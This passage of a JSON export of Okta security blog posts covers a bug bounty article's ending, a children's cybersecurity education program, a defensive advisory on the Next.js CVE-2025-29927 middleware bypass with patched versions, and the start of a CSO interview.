\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/vulnerability-reporting-policy/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Vulnerability Reporting Policy\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", which details the do’s and don’ts of security research for our Identity platforms and includes additional helpful guidance.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Watch \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/oktane/2024/sessions/bug-bounty-at-okta/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Oktane 2024 On 
Demand\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to deep dive into Okta’s BugCrowd programs from our own Product Security experts. To learn more, including how to participate, read on about \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://bugcrowd.com/engagements/okta\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s BugCrowd\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://bugcrowd.com/engagements/auth0-okta\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Auth0’s BugCrowd\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" Bug Bounty programs.\",\"marks\":[],\"data\":{}}]}]}"},"summary":{"summary":"What was once considered a controversial topic has gained widespread appeal as a crucial practice in the ongoing fight against threat actors and vulnerability exploitation. Ethical hackers and security researchers are revolutionizing today’s vulnerability management programs and reducing online risks by participating in Bug Bounty programs and disclosing vulnerabilities responsibly."},"updatedAt":"2025-04-09T16:56:16.284Z","secAuthor":[{"id":"2f88c41e-3abf-5fcc-9a06-9ed78081f8e2","bio":{"bio":"<p>Carmen Girardin is a Manager, Security Communications at Okta. Backed by over a decade of experience in the fintech sector, Carmen is a proficient technical writer with domain expertise in Identity and Access Management (IAM). She is passionate about delivering engaging, timely customer communications on the cybersecurity ecosystem and the evolving threat landscape, to help our customers gain the most value from Okta. 
Carmen spends her downtime traveling, thrifting for treasures and reading.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/gBvc42utKRh6jJpgLjxrt/fb5e38cd4c6043a5e888850b4b2c2df4/IMG_8061.jpg"},"name":"Carmen Girardin","jobTitle":"Manager, Security Communications","slug":"/hackers/carmen-girardin","node_locale":"en"}]},{"slug":"/articles/2025/03/cybersecurity-next-gen","id":"6f784a53-c4c5-5fbc-b97e-e14120ad32c9","title":"Cybersecurity’s Next Gen","date":"2025-03-26T00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Children are diving into the digital world earlier than ever, making it essential to instill good cyber habits from the start. This year, a staggering \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.emarketer.com/content/data-drop-5-charts-on-childrens-internet-habits\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"80%\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" of internet users under the age of 11 will use a tablet at least once a month. However, many young users explore the online world without fully understanding its risks. As technology becomes a staple in childhood, teaching kids how to safely navigate the internet is more important than ever.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Cyber safety begins with healthy cybersecurity habits. Early adoption of good habits can protect our youth from online threats like cyberbullying, exposure to inappropriate content, and identity theft. 
Okta’s commitment to security from the ground up is demonstrated by empowering the next generation with essential cybersecurity skills.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Cyber Kidz\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Earlier this year, Okta’s Security Culture team launched its Cyber Kidz program in Sydney, Australia. The program is designed to empower children to stay safe through hands-on learning, interactive games, and real-world cybersecurity challenges. Our goal is to equip our youth with essential digital skills, fostering cybersecurity awareness and education in a fun, family-friendly environment that promotes practical cybersecurity habits across generations.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The in-person holiday event encouraged our little learners to recognize online threats, protect their personal information, and develop strong cyber habits, all while having fun! To best engage our Cyber Kidz, we tailored activities to their age groups with targeted, age-appropriate activities.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Building the Defenders of Tomorrow\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Our cyber adventurers had an incredible time diving into the world of cybersecurity through hands-on activities and interactive challenges. They explored key cyber concepts with fun games like interactive hangman and a scavenger hunt, all while making new friends along the way. 
Creativity flowed as they built robots and circuit boards, experimented with coding games, and worked on arts and crafts.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"For those ready to advance their skill set, the adventure continued with ethical hacking, cracking ciphers, and cyber sleuthing. They kicked the day off with an engaging session from the Australian Federal Police on online safety before testing their skills in an epic capture-the-flag challenge—cracking codes, crafting phishing emails, picking locks, and even attempting to socially engineer Okta employees.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The success of our program came down to one simple approach: our team took the time to step into the digital world of each participant, designing activities that genuinely engaged and educated them. Cyber safety isn’t just about the next generation — it’s a responsibility for all of us. As we equip young minds with the skills to navigate the online world safely, it's equally important for parents and caregivers to stay informed. Keeping up with the latest technologies and understanding evolving cyber threats is key to fostering a culture of security at home and beyond.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Expanding our Reach\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Building on this success, we’re excited to take our cybersecurity education program global at Okta! 
To reach even more young minds, the program will tackle real-world cybersecurity issues such as: \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"misinformation and fake news,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"social engineering, and \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"the lasting impact of a digital footprint. \",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Through interactive cyber simulations designed for different skill levels, participants will learn to critically assess online information, recognize manipulation tactics, and understand how their digital actions shape their online identity. To make learning even more immersive, we’re incorporating Amazing Race-style capture-the-flag challenges, where participants will race against time to solve puzzles, decode clues, and apply their cybersecurity knowledge in fast-paced, high-energy competitions.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"By making cybersecurity education more accessible and engaging, we’re empowering the next generation of digital defenders—wherever they are in the world. 
If you’re interested in learning more about our global initiative or want to explore how this program can benefit your organization, contact us at \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"mailto:securityculture@okta.com\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"securityculture@okta.com\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". We’d love to share more about how we can work together to create a safer digital future.\",\"marks\":[],\"data\":{}}]}]}"},"summary":{"summary":"Cyber safety begins with healthy cybersecurity habits. Early adoption of good habits can protect our youth from online threats like cyberbullying, exposure to inappropriate content, and identity theft. This blog article introduces Okta's Cyber Kidz program, which was launched earlier this year in Sydney, Australia. Okta’s commitment to security from the ground up is demonstrated by empowering the next generation with essential cybersecurity skills. "},"updatedAt":"2025-03-26T17:52:14.529Z","secAuthor":[{"id":"2f88c41e-3abf-5fcc-9a06-9ed78081f8e2","bio":{"bio":"<p>Carmen Girardin is a Manager, Security Communications at Okta. Backed by over a decade of experience in the fintech sector, Carmen is a proficient technical writer with domain expertise in Identity and Access Management (IAM). She is passionate about delivering engaging, timely customer communications on the cybersecurity ecosystem and the evolving threat landscape, to help our customers gain the most value from Okta. 
Carmen spends her downtime traveling, thrifting for treasures and reading.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/gBvc42utKRh6jJpgLjxrt/fb5e38cd4c6043a5e888850b4b2c2df4/IMG_8061.jpg"},"name":"Carmen Girardin","jobTitle":"Manager, Security Communications","slug":"/hackers/carmen-girardin","node_locale":"en"},{"id":"b9b8fd15-ef20-5964-84b5-33227017531e","bio":{"bio":"<p> Caroline von Konigsmark is a Senior Security Culture Analyst at Okta. She champions a human-centered approach to security that moves beyond checkboxes and fear-based messaging to create a culture of shared responsibility. With a background in communications and experience in a regulatory cyber role, Caroline brings a unique lens to the challenge of driving behavioral change. She designs engagement strategies grounded in empathy, clarity, and storytelling, helping people feel informed, empowered, and invested in security.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/2aSk0IoKCi4O0jCqesigDQ/4c37469dfa746231be167be4d5c1d3af/b0f1b21b-81e5-42ef-9f91-743f43a71106.jpeg"},"name":"Caroline von Konigsmark","jobTitle":null,"slug":"/hackers/caroline-von-konigsmark","node_locale":"en"}]},{"slug":"/nextjs-CVE-202529927","id":"c45ef287-575c-5b98-a172-fa5daacf5795","title":"Next.js CVE-2025-29927","date":"2025-03-24T00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"On March 21, 2025, Vercel disclosed a critical security vulnerability (\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/advisories/GHSA-f82v-jwr5-mffw\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"CVE-2025-29927\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\") which makes it possible to bypass authorization 
checks within a Next.js application if the authorization check occurs in middleware.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Note\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\": The Okta service is not affected by this vulnerability.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Action for nextjs-auth0 SDK customers\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"For Auth0 customers using Next.js applications with the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/auth0/nextjs-auth0\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"nextjs-auth0\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" SDK we recommend auditing your codebase for any logic where authentication or authorization decisions are \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"exclusively\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" made in middleware functions. 
Below are examples of this logic in v4 and v3 of the SDK.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/auth0/nextjs-auth0/blob/main/EXAMPLES.md#middleware\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"v4 of the SDK\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\":\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"import { NextRequest, NextResponse } from \\\"next/server\\\"\\nimport { auth0 } from \\\"@/lib/auth0\\\"\\nexport async function middleware(request: NextRequest) {\\n  const authRes = await auth0.middleware(request)\\n if (request.nextUrl.pathname.startsWith(\\\"/auth\\\")) {\\n    return authRes\\n  }\\n  const session = await auth0.getSession(request)\\n  if (!session) {\\n    // user is not authenticated, redirect to login page\\n    return NextResponse.redirect(new URL(\\\"/auth/login\\\", request.nextUrl.origin))\\n  }\\n  // the headers from the auth middleware should always be returned\\n  return authRes\\n}\",\"marks\":[{\"type\":\"code\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"\\n\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/auth0/nextjs-auth0/blob/v3/EXAMPLES.md#protecting-pages-with-middleware\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"v3 of the SDK\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\":\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"// middleware.js\\nimport { withMiddlewareAuthRequired } from '@auth0/nextjs-auth0/edge';\\nexport default 
withMiddlewareAuthRequired();\",\"marks\":[{\"type\":\"code\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"\\n\\n\",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"// middleware.js\\nimport { withMiddlewareAuthRequired, getSession } from '@auth0/nextjs-auth0/edge';\\nexport default withMiddlewareAuthRequired(async function middleware(req) {\\n  const res = NextResponse.next();\\n  const user = await getSession(req, res);\\n  …\\n})\",\"marks\":[{\"type\":\"code\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"\\n\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If you are using any other third-party library (for example, NextAuth.js) we also recommend you review your application for similar logic. For example, \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://next-auth.js.org/configuration/nextjs#middleware\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"only relying on a middleware\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to protect your application:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"export { default } from \\\"next-auth/middleware\\\";\\nexport const config = {\\n    matcher: [\\\"/dashboard\\\"]\\n};\",\"marks\":[{\"type\":\"code\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"\\n\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Remediation\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"To remediate this vulnerability, upgrade to one of the following versions of 
Next.js:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Next.js 15\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"15.2.3\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Next.js 14\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"14.2.25\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Next.js 13\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"13.5.9\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Next.js 12\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"12.3.5\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If upgrading Next.js is not an option, the official recommendation is to block external requests which contain the 
\",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"x-middleware-subrequest \",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"header.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Not Affected\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\\nYour application is not affected under the following conditions:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Applications hosted on Vercel\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Applications hosted on Netlify\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Applications deployed as static exports\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Applications that do not exclusively rely on the Next.js Middleware for authentication and authorization. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Applications that perform additional authentication for all Server Rendered Components, Page Routes, or API Routes. 
This can be done by invoking \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"auth0.getSession()\",\"marks\":[{\"type\":\"code\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" in v4 or by using \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"getSession()\",\"marks\":[{\"type\":\"code\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\", \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"withApiAuthRequired\",\"marks\":[{\"type\":\"code\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" or \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"withPageAuthRequired\",\"marks\":[{\"type\":\"code\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" in v3.\",\"marks\":[],\"data\":{}}]}]}]}]}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Additional Resources\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://nvd.nist.gov/vuln/detail/CVE-2025-29927\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"https://nvd.nist.gov/vuln/detail/CVE-2025-29927\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/advisories/GHSA-f82v-jwr5-mffw\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"https://github.com/advisories/GHSA-f82v-jwr5-mffw\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" 
\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://nextjs.org/blog/cve-2025-29927\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"https://nextjs.org/blog/cve-2025-29927\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developers.cloudflare.com/changelog/2025-03-22-next-js-vulnerability-waf/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"https://developers.cloudflare.com/changelog/2025-03-22-next-js-vulnerability-waf/\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}"},"summary":{"summary":"On March 21, 2025, Vercel disclosed a critical security vulnerability (CVE-2025-29927) which makes it possible to bypass authorization checks within a Next.js application if the authorization check occurs in middleware. 
Note: The Okta service is not affected by this vulnerability.\n"},"updatedAt":"2025-03-24T07:19:38.658Z","secAuthor":[{"id":"1e934185-d220-5cf6-915f-afe21369ab6b","bio":{"bio":""},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/2mSwf13fQ5aH31DZNddqtd/0855adabe0c07ddc9ceaa460ebd1d935/Okta_Aura_CMYK_Black.jpg"},"name":"Okta","jobTitle":"","slug":"okta","node_locale":"en"}]},{"slug":"/articles/2025/03/cso-conversations-matthew-hansen","id":"ff47dcaf-ab11-52de-af84-f9f53c2258e1","title":"CSO Conversations: Matthew Hansen, Regional CSO of Americas West","date":"2025-03-19T00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"CSO Conversations is a blog series interviewing Okta’s Regional CSOs supporting David Bradbury, Okta’s Chief Security Officer in providing the best service for our customers. Okta’s Regional CSOs are integral to Okta’s Security Trust and Culture team, building and strengthening trusted advisor relationships with global security thought leadership.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"heading-5\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What motivated you to pursue a career in cybersecurity?\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"I started my career working in the risk consulting practice for a Big 4 firm and learned that cybersecurity was a critical component for customers in highly regulated industries. 
A significant influence on shaping my career in risk management was primarily focusing on the financial services, pharmaceuticals, aviation, and oil and gas industries, each of which has unique regulatory and security requirements.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-5\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"How has your past audit and regulatory compliance experience shaped your approach to cybersecurity today?\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"My journey of risk management consulting and internal audit has given me broad exposure to a number of industries, frameworks, and regulations. But I believe it presents a common theme: companies have implemented the Three Lines of Defense framework. Often, operationally speaking, employees still overlook risk management as “not their problem.” I’m motivated to be an agent of change and help companies address their risk through an Identity risk-based lens.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-5\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What are your thoughts on the importance of vulnerability management in cybersecurity?\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Like everything in the tech world, the vulnerability management landscape is constantly evolving. Organizations need to prioritize not only how they protect their businesses and stakeholders but also how they tactically respond to weaknesses before attackers can exploit them. 
With budget and resource constraints putting more emphasis on automation efficiency and AI, we see organizations scaling at incredible speeds in reducing their risk of exposure or attack.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-5\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If you could provide a few short cybersecurity words of wisdom to Okta customers, what would they be?\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"When looking at your organization's identity evolution, don't just “throw the kitchen sink” as the only solution. Instead, try to create specific, measurable, achievable, relevant, and time-bound goals to methodically tackle cybersecurity problems.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-5\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In your opinion, what is the impact of cybersecurity awareness in today’s organizations?\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The First Lines of Defense in any organization are its people. Throughout my career, I’ve found that cybersecurity maturity and security awareness among your employees must be in unison for a strong fabric of cybersecurity DNA. You cannot have one without the other. The level of maturity and strength of your security culture can have a double-down effect on increasing accountability, promoting ownership, and strengthening how your organization manages risks. 
\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-5\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In what ways do you demonstrate \",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/blog/2024/04/the-story-behind-oktas-values/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s corporate values\",\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" in your day to day?\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s core values are deeply rooted principles that guide our day-to-day decisions and actions. This translates to a unique set of tenets that drive our interactions with customers to help build trustworthy relationships, uplift their identity posture, reduce security friction, and produce positive security outcomes. To make Okta and our customers the most secure companies in the world, we’re placing big bets to deliver on our 